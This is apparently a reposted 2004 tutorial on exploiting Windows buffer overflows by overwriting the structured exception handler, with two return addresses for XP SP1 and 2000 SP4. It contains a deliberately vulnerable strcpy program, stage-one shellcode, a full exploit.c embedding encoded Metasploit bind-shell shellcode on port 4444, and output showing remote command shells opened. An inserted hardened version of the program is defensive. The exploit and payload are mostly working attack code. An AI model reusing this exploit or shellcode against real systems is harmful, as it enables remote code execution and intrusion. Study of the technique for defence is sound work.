Exploiting Default Exception Handler to Increase Exploit Sta

韩冰

Posted on 2004-11-19 10:39
The goal of this method is to create a stable exploit that successfully exploits a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address, but in this case we keep overwriting the stack and overwrite the default exception handler as well.

[Buf]                 <- Shellcode
[Return Address]      <- jmp register (for Windows XP SP1)
[Various Stack Data]  <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler]          <- jmp register (for Win2k SP4)
[Stage1 Shellcode]    <- stage1 shellcode for Win2k

If the first return address (Windows XP SP1) is wrong, an exception occurs and the default exception handler is called, which now holds the Windows 2000 SP4 return address. This lets us build a stable exploit with two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:
//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){

    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }

    strcpy(buf,argv[1]); // unbounded copy of argv[1] into the 512-byte buf
    return 0x0;
}
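For contrast, here is a hardened counterpart to lamebuf.c. This is an added example, not code from the original post: it keeps the same control flow but replaces the unbounded strcpy() with a copy that refuses input that does not fit, so neither the return address nor the SEH record above buf can be reached. The helper names copy_arg, handle_arg and try_length are this example's own.

```c
// Hardened counterpart to lamebuf.c (added example, not the original post's
// code). An argument that does not fit in buf is rejected instead of copied.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 512   /* same buffer size as lamebuf.c */

/* Copy src into dst (capacity dstlen) only if it fits including its NUL.
 * Returns 0 on success, -1 on oversize or bad arguments; on failure dst is
 * left as an empty string so a caller cannot use a half-copied value. */
int copy_arg(char *dst, size_t dstlen, const char *src) {
    if (dst == NULL || src == NULL || dstlen == 0) return -1;
    /* Look for the terminator within the destination's capacity only. */
    const char *nul = memchr(src, '\0', dstlen);
    if (nul == NULL) {          /* no NUL in the first dstlen bytes */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Same control flow as lamebuf.c's main(), with the copy bounded. */
int handle_arg(const char *arg) {
    char buf[BUF_SIZE];
    if (copy_arg(buf, sizeof(buf), arg) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -1;
    }
    return 0;
}

/* Exercise handle_arg() with a constructed n-byte run of 'A' (the filler
 * the post's 1600-byte crash used). Returns handle_arg()'s result. */
int try_length(size_t n) {
    char *s = malloc(n + 1);
    if (s == NULL) return -2;
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = handle_arg(s);
    free(s);
    return rc;
}

int main(int argc, char *argv[]) {
    if (argc != 2) return -1;
    return handle_arg(argv[1]);
}
```

Visual C++'s /GS cookie and /SafeSEH each break one link of the chain described above (the return-address overwrite and the handler overwrite respectively), but bounding the copy removes the bug itself.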

Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

Primary Return Address (Windows XP SP1 EN):
The first return address is called as in a normal stack overflow. We can see that ESP points to user input, so we use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address is called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<process.h> // execve

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc,char *argv[]){

    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf,0x0,sizeof(buf));
    memset(buf,0x90,1652);
    memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

    memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode

    *(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0],bufExe,NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.